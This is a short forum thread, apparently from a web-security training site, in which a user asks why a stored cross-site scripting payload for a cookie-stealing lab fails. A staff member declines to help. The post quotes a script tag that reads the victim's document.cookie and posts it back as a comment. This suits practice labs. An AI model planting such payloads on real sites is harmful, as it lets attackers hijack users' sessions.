Exploiting cross-site scripting to steal cookie

Dai | Last updated: Sep 04, 2019 11:35AM UTC

I'm doing the lab without using Burp Collaborator, so I need to write some custom JavaScript to make a POST request to comment the cookie whenever a user views the comment. My code is as follows:

    <script>
    var cookie = document.cookie;
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('csrf=xFqO8r8W2Qip7I1wkiCLgI2WcimCYbwB&postId=1&comment='+cookie+'&name=asdf&email=adsf%40adf&website=http%3A%2F%2Faffaf.com');
    </script>

But it doesn't seem to work. I'm at a loss as to how to test / verify it or how to change it. Could someone please advise? Thanks

Liam, PortSwigger Agent | Last updated: Sep 04, 2019 03:46PM UTC

We don't provide a mentoring service for the labs. This might be something we consider doing in future along with video-based solutions. The lab can be completed. Keep trying.

